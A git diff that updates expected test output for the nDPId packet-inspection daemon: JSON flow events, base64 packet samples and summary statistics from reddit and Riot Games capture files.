+00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1605291686985,"flow_last_seen":1605291698522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2333,"flow_tot_l4_payload_len":45370,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291690373,"flow_last_seen":1605291690520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5684,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
00573{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","packets-captured":11682,"packets-processed":11682,"total-skipped-flows":0,"total-l4-payload-len":10573423,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":59,"total-detection-updates":84,"total-updates":0,"current-active-flows":0,"total-active-flows":60,"total-idle-flows":60,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":447,"global_ts_msec":1605291698785} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 11682/11682 @@ -453,9 +453,9 @@ ~~ total active/idle flows...: 60/60 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6500321 bytes -~~ total memory freed........: 6500321 bytes -~~ total allocations/frees...: 130346/130346 +~~ total memory allocated....: 6633955 bytes +~~ total memory freed........: 6633955 bytes +~~ total allocations/frees...: 133108/133108 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 1464 chars diff --git a/test/results/riotgames.pcap.out b/test/results/riotgames.pcap.out new file mode 100644 index 000000000..de8e94d8a --- /dev/null +++ b/test/results/riotgames.pcap.out 
@@ -0,0 +1,73 @@ +00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"riotgames.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1644446178115} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644446178115,"flow_last_seen":1644446178115,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1644446178115,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":59956,"dst_port":7194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1644446178115,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1644446178115,"pkt":"eJS0JASgYDjgxTWgCABFAABREOUAAH8RfLDAqAJkovlIAeo0HBoAPXYrpJ+cMaAyQgQBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmLme68LgEtiVPLEfLeojRgw="} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644446178115,"flow_last_seen":1644446178115,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1644446178115,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":59956,"dst_port":7194,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1644446179143,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1644446179143,"pkt":"eJS0JASgYDjgxTWgCABFAABREOYAAH8RfK\/AqAJkovlIAeo0HBoAPXYrpJ+cMaAyQgQBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmLme68LgEtiVPLEfLeojRgw="} 
+00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1644446180176,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1644446180176,"pkt":"eJS0JASgYDjgxTWgCABFAABREOcAAH8RfK7AqAJkovlIAeo0HBoAPXYrpJ+cMaAyQgQBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmLme68LgEtiVPLEfLeojRgw="} +00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":863,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1648063928092} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648063928092,"flow_last_seen":1648063928092,"flow_idle_time":200000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1648063928092,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.179.216.242","src_port":48526,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1648063928092,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":50,"pkt_l4_len":16,"thread_ts_msec":1648063928092,"pkt":"eJS0JASgYDjgxTWgCABFAAAkz4FAAD8R+pTAqAJk1bPY8r2Ow1QAECUCEzfK\/goAAAA="} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648063928092,"flow_last_seen":1648063928092,"flow_idle_time":200000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1648063928092,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.179.216.242","src_port":48526,"dst_port":50004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1648063928151,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":16,"thread_ts_msec":1648063928151,"pkt":"YDjgxTWgeJS0JASgCABFAAAk5k1AADcR68jVs9jywKgCZMNUvY4AECUCEzfK\/goAAAAAAAAAAAAAAAAA"} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":18,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1644446178115,"flow_last_seen":1644446183618,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1648063928151,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":59956,"dst_port":7194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":18,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":18,"packets-processed":17,"total-skipped-flows":0,"total-l4-payload-len":879,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1654781451507} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654781451507,"flow_last_seen":1654781451507,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654781451507,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":62854,"dst_port":8181,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1654781451507,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1654781451507,"pkt":"eJS0JASgYDjgxTWgCABFAABAaVkAAH8RJE3AqAJkovlIAfWGH\/UALPN\/c3T2DHIyQgSrWX+BH8wAh2u8AAAW43xAFAAAAKqqqqq7u7u7"} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654781451507,"flow_last_seen":1654781451507,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654781451507,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":62854,"dst_port":8181,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1654781451526,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1654781451526,"pkt":"YDjgxTWgeJS0JASgCABFAABAcP9AADgRI6ei+UgBwKgCZB\/19YYALF0BcjJCBAAAAACrWX+BH8wAh2u8AAAW43xAFAAAAKqqqqq7u7u7"} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1648063928092,"flow_last_seen":1648063928151,"flow_idle_time":200000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1654781451526,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.179.216.242","src_port":48526,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":20,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":19,"total-skipped-flows":0,"total-l4-payload-len":951,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":3,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":20,"global_ts_msec":1654783623503} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654783623503,"flow_last_seen":1654783623503,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654783623503,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"43.229.65.1","src_port":54231,"dst_port":7998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1654783623503,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1654783623503,"pkt":"eJS0JASgYDjgxTWgCABFAABAtqAAAH8RVRrAqAJkK+VBAdPXHz4ALLwuE5sFlpUyRyCrWX+BH8wGEZxbAABBqxZPGQAAAKqqqqq7u7u7"} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654783623503,"flow_last_seen":1654783623503,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654783623503,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"43.229.65.1","src_port":54231,"dst_port":7998,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1654783623769,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1654783623769,"pkt":"YDjgxTWgeJS0JASgCABFAABA3N9AADARPdsr5UEBwKgCZB8+09cALNVflTJHIAAAAACrWX+BH8wGEZxbAABBqxZPGQAAAKqqqqq7u7u7"} 
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":22,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654781451507,"flow_last_seen":1654781451526,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654783623769,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":62854,"dst_port":8181,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":22,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":22,"packets-processed":21,"total-skipped-flows":0,"total-l4-payload-len":1023,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":26,"global_ts_msec":1654785423332} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654785423332,"flow_last_seen":1654785423332,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654785423332,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":58106,"dst_port":8181,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1654785423332,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1654785423332,"pkt":"eJS0JASgYDjgxTWgCABFAABA04EAAH8RuiTAqAJkovlIAeL6H\/UALG1KXY5aogEy\/RarWX+BH8wKaJLmAAB8mNx\/HQAAAKqqqqq7u7u7"} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654785423332,"flow_last_seen":1654785423332,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654785423332,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":58106,"dst_port":8181,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1654785423380,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1654785423380,"pkt":"YDjgxTWgeJS0JASgCABFAABASwdAADYRS5+i+UgBwKgCZB\/14voALCV7ATL9FgAAAACrWX+BH8wKaJLmAAB8mNx\/HQAAAKqqqqq7u7u7"} 
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654783623503,"flow_last_seen":1654783623769,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654785423380,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"43.229.65.1","src_port":54231,"dst_port":7998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":24,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":24,"packets-processed":23,"total-skipped-flows":0,"total-l4-payload-len":1095,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":32,"global_ts_msec":1654790643639} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654790643639,"flow_last_seen":1654790643639,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654790643639,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":50004,"dst_port":8181,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1654790643639,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1654790643639,"pkt":"eJS0JASgYDjgxTWgCABFAABAp6MAAH8R5gLAqAJkovlIAcNUH\/UALPlTK70DER4y\/RWrWX+BH8wXFh2xAABS+GKnKQAAAKqqqqq7u7u7"} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654790643639,"flow_last_seen":1654790643639,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654790643639,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":50004,"dst_port":8181,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1654790643680,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1654790643680,"pkt":"YDjgxTWgeJS0JASgCABFAABAVJVAADURQxGi+UgBwKgCZB\/1w1QALCgiHjL9FQAAAACrWX+BH8wXFh2xAABS+GKnKQAAAKqqqqq7u7u7"} 
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654785423332,"flow_last_seen":1654785423380,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654790643680,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":58106,"dst_port":8181,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":26,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":26,"packets-processed":25,"total-skipped-flows":0,"total-l4-payload-len":1167,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":6,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":38,"global_ts_msec":1655323563669} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655323563669,"flow_last_seen":1655323563669,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655323563669,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"43.229.65.1","src_port":63038,"dst_port":7998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1655323563669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1655323563669,"pkt":"eJS0JASgYDjgxTWgCABFAABAIVQAAH8R6mbAqAJkK+VBAfY+Hz4ALJnHE5sFlpUyRyCrWX+BDpAHcmnvAADfWdrm+QAAAKqqqqq7u7u7"} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655323563669,"flow_last_seen":1655323563669,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655323563669,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"43.229.65.1","src_port":63038,"dst_port":7998,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1655323563941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1655323563941,"pkt":"YDjgxTWgeJS0JASgCABFAABAW6NAAC8RwBcr5UEBwKgCZB8+9j4ALLL4lTJHIAAAAACrWX+BDpAHcmnvAADfWdrm+QAAAKqqqqq7u7u7"} 
